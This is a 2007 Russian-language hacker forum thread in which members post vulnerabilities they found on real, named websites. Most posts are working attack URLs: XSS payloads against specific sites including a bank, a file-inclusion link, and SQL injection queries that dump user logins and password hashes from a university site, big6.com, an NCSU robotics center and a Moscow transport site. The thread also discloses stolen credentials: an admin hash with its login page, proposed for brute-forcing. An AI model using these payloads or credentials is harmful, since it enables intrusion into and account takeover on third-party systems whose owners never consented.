Уязвимости найденные вами, sql-inj, php-incl, xss... |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Начну я. Инклюд для начала. QUOTE | |
| |
16.06.2007 - 9:27 |
zombie18
Опытный юзверь
Группа: Пользователи Сообщений: 71 Регистрация: 11.02.2006 Пользователь №: 119.671
Респектов: 13
Предупреждений:
| ну вот xss докучи... QUOTE в поле Ф.И.О. вписываем CODE "><script>alert(/xss/)</script>
+1 QUOTE помоему в любое поле вообще... такую же байду: CODE "><script>alert(/xss/)</script>
+1 QUOTE тоже куда хошь... ниче не фильтруется... CODE "><script>alert(/xss/)</script>
+1 QUOTE в поиске пишем: CODE "><script>alert(/xss/)</script>
+1 вот тебе и юниаструм банк (^_~) QUOTE в поле Фамилия, Имя, Отчество: тот же баг у всех на "> CODE "><body onLoad=alert('xss')>
+1 QUOTE при регистрации поле "ник" не фильтруется, можно написаль там к примеру: CODE "><script>alert('xss')</script> чтобы посмотреть пример залогиньтесь с e-mail: [email protected]password: cIRLlQ
+1 QUOTE уязвимо поле e-mail. пример использования: CODE http://www.klerk.ru/subscribe/register.php?email=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E | |
| |
29.07.2007 - 21:15 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| CODE http://www.oninit.com/reference/index.php?page=[url] | |
| |
7.08.2007 - 18:30 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| LZA Terminologijas komisijaОдин из местных универов. CODE http://termini.lza.lv/article.php?id=-1+union+select+1,2,3,concat_ws(user,0x3a,pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+users/* user: red1 pass: $1$ugldXdZ6$D06H80Jn5ab5Ok3HymTv8/ | |
| |
21.08.2007 - 18:14 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Big6: Information Skills for Student Achievement Форум (цепляем по одному, кто админ незнаю, мемберлист не смотрел, там регаться надо ...): Code http://big6.com/showarticle.php?id=-1+union+select+concat_ws(username,0x3a,user_password),2,3,4,5+from+big6_users+limit+1,1/* Блог (сразу админ): Code http://big6.com/showarticle.php?id=-1+union+select+concat_ws(user_login,0x3a,user_pass),2,3,4,5+from+blo_users+limit+0,1/* Все хеши md5. | |
| |
21.08.2007 - 20:34 |
ZaHack
Большой Брат
Группа: Заблокированные Сообщений: 1.252 Регистрация: 24.01.2006 Из: Where The Eagles Fly Пользователь №: 333
Респектов: 117
| Не совсем по теме (тут больше веб-уязвимости), но все же: Переполнение буфера обмена программы helpctr.exe Уязвимые ОС: Win XP При вводе в IE строки: Code hcp://w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.
происходит запуск самой программы helpctr.exe Это происходит из-за возникновения в приложении исключения (которое вызывается удаленно из браузера) PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$ PPS Работает не на всех компьютерах. | |
| |
21.08.2007 - 23:07 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Цитата | Quote(ZaHack @ 21.08.2007 - 20:34) PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$ А почему нет? Переполненяем буфер, передаём управление шелл-коду... Все. | |
| |
28.08.2007 - 19:00 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Code http://www.varmint.org/ishop/index.php?GID=-1+union+select+1,2,version(),4,5,6,7,8,9,1,2/* Таблицы лень подбирать... | |
| |
28.08.2007 - 19:14 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| ГОРОДСКОЙ ЭЛЕКТРОТРАНСПОРТ совмещённый трамвайно-троллейбусный сайтCode http://stts.mosfont.ru/articles.php?gid=-1+union+select+1,table_name+from+information_schema.tables+limit+0,1/* | |
| |
28.08.2007 - 20:06 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| www.crim.ncsu.eduCenter for Robotics and Intelligent MachinesДостаем логин и хеш: Code http://www.crim.ncsu.edu/project_detailed.php?id=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+wp_users+limit+0,1/* admin:75bb40f591c0db371aba50f65741d73f Можно сбрутить... Логинимся тут: http://www.crim.ncsu.edu/login.phpСтатическая инфа: Версия: 5.0.19-max-log Пользователь: [email protected]База: wp_crim | |
| |
|
|